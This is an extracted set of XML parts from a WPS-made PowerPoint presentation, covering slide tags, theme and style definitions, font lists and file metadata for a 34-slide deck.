</p:tagLst>
</file>

<file path=ppt/tags/tag82.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag83.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag84.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85.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag86.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag87.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag88.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag89.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag90.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1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag92.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag93.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag94.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag95.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag96.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97.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag98.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag99.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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19.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="16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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="17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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="18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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="19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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="20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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="21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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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14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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="28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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="29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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="30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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="3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ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:style>
        <a:lnRef idx="2">
          <a:schemeClr val="accent1"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:srgbClr val="FFFFFF"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:srgbClr val="FFFFFF"/>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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="32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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="33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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="34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3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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="35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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="36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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="37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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:lnSpc>
            <a:spcPct val="90000"/>
          </a:lnSpc>
          <a:defRPr lang="en-US" sz="2000">
            <a:latin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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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solidFill>
          <a:srgbClr val="00B0F0">
            <a:alpha val="5000"/>
          </a:srgbClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:defRPr lang="en-US" sz="2500">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>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47.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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none" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:defRPr sz="1500">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:sym typeface="+mn-ea"/>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52.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="11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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="15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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="16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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="17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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="18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59.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="19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2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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="20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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="22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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="24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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="13_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a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Hang" typeface="맑은 고딕"/>
        <a:font script="Hans" typeface="微软雅黑"/>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微软雅黑"/>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5.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6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3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4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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="5_自定义设计方案">
  <a:themeElements>
    <a:clrScheme name="新版空白演示配色">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0F1423"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="6096E6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="58B6E5"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="56CA95"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="FFBA55"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F18870"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="EC5F74"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0563C1"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="954D72"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="自定义 9">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26749</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>722</Paragraphs>
  <Slides>34</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>64</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="125" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>黑体-简</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Times New Roman Bold</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>135_自定义设计方案</vt:lpstr>
      <vt:lpstr>143_自定义设计方案</vt:lpstr>
      <vt:lpstr>134_自定义设计方案</vt:lpstr>
      <vt:lpstr>1_自定义设计方案</vt:lpstr>
      <vt:lpstr>2_自定义设计方案</vt:lpstr>
      <vt:lpstr>3_自定义设计方案</vt:lpstr>
      <vt:lpstr>4_自定义设计方案</vt:lpstr>
      <vt:lpstr>5_自定义设计方案</vt:lpstr>
      <vt:lpstr>6_自定义设计方案</vt:lpstr>
      <vt:lpstr>7_自定义设计方案</vt:lpstr>
      <vt:lpstr>8_自定义设计方案</vt:lpstr>
      <vt:lpstr>9_自定义设计方案</vt:lpstr>
      <vt:lpstr>10_自定义设计方案</vt:lpstr>
      <vt:lpstr>11_自定义设计方案</vt:lpstr>
      <vt:lpstr>12_自定义设计方案</vt:lpstr>
      <vt:lpstr>13_自定义设计方案</vt:lpstr>
      <vt:lpstr>14_自定义设计方案</vt:lpstr>
      <vt:lpstr>15_自定义设计方案</vt:lpstr>
      <vt:lpstr>16_自定义设计方案</vt:lpstr>
      <vt:lpstr>17_自定义设计方案</vt:lpstr>
      <vt:lpstr>18_自定义设计方案</vt:lpstr>
      <vt:lpstr>19_自定义设计方案</vt:lpstr>
      <vt:lpstr>20_自定义设计方案</vt:lpstr>
      <vt:lpstr>21_自定义设计方案</vt:lpstr>
      <vt:lpstr>22_自定义设计方案</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>23_自定义设计方案</vt:lpstr>
      <vt:lpstr>24_自定义设计方案</vt:lpstr>
      <vt:lpstr>25_自定义设计方案</vt:lpstr>
      <vt:lpstr>26_自定义设计方案</vt:lpstr>
      <vt:lpstr>27_自定义设计方案</vt:lpstr>
      <vt:lpstr>28_自定义设计方案</vt:lpstr>
      <vt:lpstr>29_自定义设计方案</vt:lpstr>
      <vt:lpstr>30_自定义设计方案</vt:lpstr>
      <vt:lpstr>31_自定义设计方案</vt:lpstr>
      <vt:lpstr>32_自定义设计方案</vt:lpstr>
      <vt:lpstr>33_自定义设计方案</vt:lpstr>
      <vt:lpstr>34_自定义设计方案</vt:lpstr>
      <vt:lpstr>35_自定义设计方案</vt:lpstr>
      <vt:lpstr>36_自定义设计方案</vt:lpstr>
      <vt:lpstr>37_自定义设计方案</vt:lpstr>
      <vt:lpstr>2_Office 主题</vt:lpstr>
      <vt:lpstr>3_Office 主题</vt:lpstr>
      <vt:lpstr>4_Office 主题</vt:lpstr>
      <vt:lpstr>5_Office 主题</vt:lpstr>
      <vt:lpstr>6_Office 主题</vt:lpstr>
      <vt:lpstr>7_Office 主题</vt:lpstr>
      <vt:lpstr>8_Office 主题</vt:lpstr>
      <vt:lpstr>9_Office 主题</vt:lpstr>
      <vt:lpstr>10_Office 主题</vt:lpstr>
      <vt:lpstr>11_Office 主题</vt:lpstr>
      <vt:lpstr>12_Office 主题</vt:lpstr>
      <vt:lpstr>14_Office 主题</vt:lpstr>
      <vt:lpstr>15_Office 主题</vt:lpstr>
      <vt:lpstr>16_Office 主题</vt:lpstr>
      <vt:lpstr>17_Office 主题</vt:lpstr>
      <vt:lpstr>18_Office 主题</vt:lpstr>
      <vt:lpstr>19_Office 主题</vt:lpstr>
      <vt:lpstr>20_Office 主题</vt:lpstr>
      <vt:lpstr>22_Office 主题</vt:lpstr>
      <vt:lpstr>23_Office 主题</vt:lpstr>
      <vt:lpstr>24_Office 主题</vt:lpstr>
      <vt:lpstr>13_Office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Liping</dc:creator>
  <cp:lastModifiedBy>Fangtian Zhong</cp:lastModifiedBy>
  <cp:revision>110</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-09T14:35:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-09T14:35:06Z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A1378116E481472FA6251A948E06C9AB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-4.9.0.7859</vt:lpwstr>
  </property>
</Properties>
</file>